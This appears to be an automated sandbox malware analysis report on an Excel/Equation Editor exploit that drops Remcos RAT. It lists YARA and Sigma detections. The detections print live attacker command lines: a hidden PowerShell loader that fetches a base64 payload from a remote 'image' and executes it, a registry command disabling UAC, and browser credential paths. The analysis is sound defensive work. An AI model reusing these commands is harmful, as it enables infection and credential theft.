          0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            Click to see the 22 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            14.2.RegAsm.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              14.2.RegAsm.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                14.2.RegAsm.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  14.2.RegAsm.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x6aab8:$a1: Remcos restarted by watchdog!
                  • 0x6b030:$a3: %02i:%02i:%02i:%03i
                  14.2.RegAsm.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x64b7c:$str_b2: Executing file:
                  • 0x65bfc:$str_b3: GetDirectListeningPort
                  • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x65728:$str_b7: \update.vbs
                  • 0x64ba4:$str_b9: Downloaded file:
                  • 0x64b90:$str_b10: Downloading file:
                  • 0x64c34:$str_b12: Failed to upload file:
                  • 0x65bc4:$str_b13: StartForward
                  • 0x65be4:$str_b14: StopForward
                  • 0x65680:$str_b15: fso.DeleteFile "
                  • 0x65614:$str_b16: On Error Resume Next
                  • 0x656b0:$str_b17: fso.DeleteFolder "
                  • 0x64c24:$str_b18: Uploaded file:
                  • 0x64be4:$str_b19: Unable to delete:
                  • 0x65648:$str_b20: while fso.FileExists("
                  • 0x650c1:$str_c0: [Firefox StoredLogins not found]
                  Click to see the 19 entries

                  Sigma Signatures

                  Exploits

                  barindex
                  Sigma detected: EQNEDT32.EXE connecting to internet
                  Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.12.81.228, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3096, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49170
                  Sigma detected: File Dropped By EQNEDT32EXE
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3096, TargetFilename: C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS

                  System Summary

                  barindex
                  Sigma detected: Base64 Encoded PowerShell Command Detected
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
                  Sigma detected: Equation Editor Network Connection
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49170, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3096, Protocol: tcp, SourceIp: 198.12.81.228, SourceIsIpv6: false, SourcePort: 80
                  Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ?
                  Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
                  Sigma detected: Suspicious Microsoft Office Child Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3604, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS" , ProcessId: 3208, ProcessName: wscript.exe
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3604, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS" , ProcessId: 3208, ProcessName: wscript.exe
                  Sigma detected: Change PowerShell Policies to an Insecure Level
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
                  Sigma detected: Excel Network Connections
                  Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 88.99.66.38, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3604, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                  Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
                  Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bxivncg", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bxivncg", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 2496, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bxivncg", ProcessId: 1908, ProcessName: RegAsm.exe
                  Sigma detected: Suspicious Office Outbound Connections
